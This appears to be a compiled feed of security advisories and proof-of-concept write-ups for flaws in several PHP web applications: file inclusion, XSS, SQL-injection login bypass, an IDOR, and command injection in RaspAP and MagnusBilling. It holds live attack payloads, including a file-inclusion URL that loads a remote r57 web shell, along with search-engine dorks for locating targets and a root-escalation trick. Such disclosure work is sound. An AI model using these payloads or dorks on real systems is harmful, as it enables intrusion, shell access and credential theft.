Adult Video Script version 3.0 suffers from local and remote file inclusion vulnerabilities.

    ====================================================================================================================================| # Title     : Adult Video Script 3.0 RFI /LFI Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Download  : https://update.avscms.com/files/avscms-8.2-full.zip                                                                || # Dork      :  Powered by AVSCMS                                                                                                 |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] R/L File Inclusion :    Line      : 20 = include_once ('./lang/'.$lang_include);    Function  : include_once    Variables :$lang_include    C:\web\www\upload\siteadmin\editor_files\image.php[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

Adult Video Script 3.0 File Inclusion

Adiscon LogAnalyzer version 4.1.5 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Adiscon LogAnalyzer V 4.1.5 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://loganalyzer.adiscon.com/                                                                                    |  | # Dork      : "Adiscon LogAnalyzer Version 4.1.5"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOG[+] http://127.0.0.1/rsyslog.infogeniecm/login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOGGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Adiscon LogAnalyzer 4.1.5 Cross Site Scripting

PHPJabbers Knowledge Base Builder version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/knowledge-base-builder/                         ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Knowledge Base Builder 3.0                                      ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET parameter 'action' is vulnerable to RXSShttps://website/preview.php?controller=pjLoad&action=pjActionIndexd6941%3cimg%20src%3da%20onerror%3dalert(1)%3edas75&pjPage=2[-] Done

PHPJabbers Knowledge Base Builder 3.0 Cross Site Scripting

Adapt Inventory Management System version 1.0.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Adapt Inventory Management System 1.0.0 Auth By Pass Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/adapt-inventory-management-system/22838514?s_rank=7                                    |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload user & Pass : 1' or 1=1 -- -[+]  https://127.0.0.1/www/adaptinventory.com/demo/index.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Adapt Inventory Management System 1.0.0 SQL Injection

Improper Access Control in GitHub repository admidio/admidio prior to 4.2.9.

**Description**

user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case.

**Proof of Concept**

1 user1 send admin a greeting card1

2 user2 send admin a greeting card2

3 user1 delete his message related to greeting card1, using burpsuite hijack the request.

    POST /adm_program/modules/messages/messages.php?msg_uuid=7cd5f4ed-dedc-46c6-b4ec-3567246583ef HTTP/1.1
    Host: localhost:8080
    Content-Length: 49
    sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: http://localhost:8080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:8080/adm_program/modules/messages/messages.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; BBLANG=en_US; ADMIDIO_admidio_adm_SESSION_ID=beedb93711a4307d7d676817daeefd7b
    Connection: close
    
    admidio-csrf-token=6amCNCtp5js7GH8g2UwyHOU88PKm2M
    

4 changing the messges uuid as the message related to card2

5 result shows success

IDORs with unpredictable IDs are valid vulnerabilities see https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html

as the uuid is hard to predicate, we mark Attack Complexity as high

**Impact**

Impact of the Vulnerability:

This vulnerability allows a user to delete messages of other users, which can result in a loss of important communication data. This can also lead to unauthorized editing or deleting of messages, causing potential security issues for the impacted users. Additionally, an attacker may use this vulnerability to tamper with the message history and cover up their tracks, making it difficult to trace any malicious activity.

CVE-2023-3304: IDOR in message  deletion in admidio

Expand Up @@ -19,7 +19,7 @@ require(\_\_DIR\_\_ . '/../../system/login\_valid.php');  
// Initialize and check the parameters $getPhotoUuid = admFuncVariableIsValid($\_GET, 'photo\_uuid', 'string'); $getPhotoUuid = admFuncVariableIsValid($\_GET, 'photo\_uuid', 'string', array('requireValue' => true)); $getUserUuid = admFuncVariableIsValid($\_GET, 'user\_uuid', 'string'); $getPhotoNr = admFuncVariableIsValid($\_GET, 'photo\_nr', 'int', array('requireValue' => true)); $showPage = admFuncVariableIsValid($\_GET, 'show\_page', 'int', array('defaultValue' => 1)); Expand All @@ -35,47 +35,43 @@ // => EXIT }  
// URL auf Navigationstack ablegen // Drop URL on navigation stack $gNavigation\->addUrl(CURRENT\_URL, $headline);  
// Fotoveranstaltungs-Objekt erzeugen oder aus Session lesen // Create photo album object or read from session if (isset($\_SESSION\['photo\_album'\]) && (int) $\_SESSION\['photo\_album'\]->getValue('pho\_uuid') === $getPhotoUuid) { $photoAlbum =& $\_SESSION\['photo\_album'\]; } else { // einlesen des Albums falls noch nicht in Session gespeichert $photoAlbum = new TablePhotos($gDb); if ($getPhotoUuid !== '') { $photoAlbum\->readDataByUuid($getPhotoUuid); } $photoAlbum\->readDataByUuid($getPhotoUuid);  
$\_SESSION\['photo\_album'\] = $photoAlbum; }  
// pruefen, ob Album zur aktuellen Organisation gehoert if ($getPhotoUuid !== '' && (int) $photoAlbum\->getValue('pho\_org\_id') !== $gCurrentOrgId) { // check if user has right to view the album if (!$photoAlbum\->isVisible()) { $gMessage\->show($gL10n\->get('SYS\_INVALID\_PAGE\_VIEW')); // => EXIT }  
if ($gValidLogin && $gCurrentUser\->getValue('EMAIL') === '') { // der eingeloggte Benutzer hat in seinem Profil keine gueltige Mailadresse hinterlegt, // die als Absender genutzt werden kann... // the logged in user has no valid mail address stored in his profile, which can be used as sender $gMessage\->show($gL10n\->get('SYS\_CURRENT\_USER\_NO\_EMAIL', array('<a href="'.ADMIDIO\_URL.FOLDER\_MODULES.'/profile/profile.php">', '</a>'))); // => EXIT }  
if ($getUserUuid !== '') { // usr\_id wurde uebergeben, dann Kontaktdaten des Users aus der DB fischen // UUID was set than read contact data of this user $user = new User($gDb, $gProfileFields); $user\->readDataByUuid($getUserUuid);  
// darf auf die User-Id zugegriffen werden // check if the current user has the right communicate with that member if ((!$gCurrentUser\->editUsers() && !isMember((int) $user\->getValue('usr\_id'))) || strlen($user\->getValue('usr\_id')) === 0) { $gMessage\->show($gL10n\->get('SYS\_USER\_ID\_NOT\_FOUND')); // => EXIT }  
// besitzt der User eine gueltige E-Mail-Adresse // check if the member has a valid email address if (!StringUtils::strValidCharacters($user\->getValue('EMAIL'), 'email')) { $gMessage\->show($gL10n\->get('SYS\_USER\_NO\_EMAIL', array($user\->getValue('FIRST\_NAME').' '.$user\->getValue('LAST\_NAME')))); // => EXIT Expand Down

CVE-2023-3303: ecard could sent if album is logged #1432 · Admidio/admidio@3d8bafa

Command injection vulnerability in RaspAP raspap-webgui 2.8.8 and earlier allows remote attackers to run arbitrary commands via crafted POST request to hostapd settings form.

../ advisories/

Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root privileges.

**Affected products**

RaspAP v2.8.9 and older

**Steps to reproduce**

1.  Obtain credentials for RaspAP
2.  Configure and execute the following script

3.  Observe that the file /tmp/hax has been created on the raspi, and contains the output of uptime.

**Cause**

There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec().

A third instance exists at configure\_client.php:20, exploitable in a similar manner.

**Impact**

An authenticated user is able to execute arbitrary commands as www-data.

In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured sudo permissions; overwrite the openvpn client configuration to set the following:

    script-security 2
    up /tmp/payload.sh

and establish an OpenVPN connection. /tmp/payload.sh will be executed with root privileges.

**Proposed Mitigation**

Apply sanitization to the txpower and interface parameters, and use the PHP built-in escapeshellarg() before passing them to exec().

**History**

*   2023-03-30: Additional fix submitted
*   2023-03-30: Report merged for all three vulnerabilities
*   2023-03-29: Additional vulnerability reported (configure_client.php)
*   2023-03-29: Initial report removed
*   2023-03-29: Fix applied and released as v2.8.9
*   2023-03-28: Initial report filed (hostapd.php)

CVE-2023-30260: Security advisory

Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

../ advisories/

A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.

**Affected products**

magnusbilling 7 up to and including commit 7af21ed620

magnusbilling 6 (all versions)

**Steps to reproduce**

The following proof of concept uses a harmless sleep 30 command as a payload.

1.  Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
2.  Observe that the page takes 30 seconds to load
3.  Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
4.  Observe that the page takes only 3 seconds to load

**Cause**

A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

**Impact**

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.

**Proposed Mitigation**

Remove the demo code from icepay.php.

**History**

*   2023-03-28: Initial report removed by maintainer
*   2023-03-27: Vulnerability fixed
*   2023-03-27: Vulnerability reported

CVE-2023-30258: Security advisory

A vulnerability, which was classified as critical, was found in SourceCodester Game Result Matrix System 1.0. This affects an unknown part of the file /dipam/athlete-profile.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232239.

CVE-2023-3383

A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0. Affected by this vulnerability is an unknown functionality of the file /paysystem/datatable.php of the component GET Parameter Handler. The manipulation of the argument doj leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-232237 was assigned to this vulnerability.

**Online School Fees System v1.0 has reflected cross-site scripting**

BUG\_Author: zhangyf

Website source code address: https://www.sourcecodester.com/php/11708/online-school-fees-system.html

Vulnerability File: /paysystem/datatable.php

GET parameter "doj" exists reflected cross-site scripting vulnerability

Payload: /paysystem/datatable.php?student=1&doj=<script>alert(document.cookie)</script>&type=feesearch

The js code is successfully executed and the cookie value is returned, which proves that there is a reflected cross-site scripting vulnerability.

Tag

#php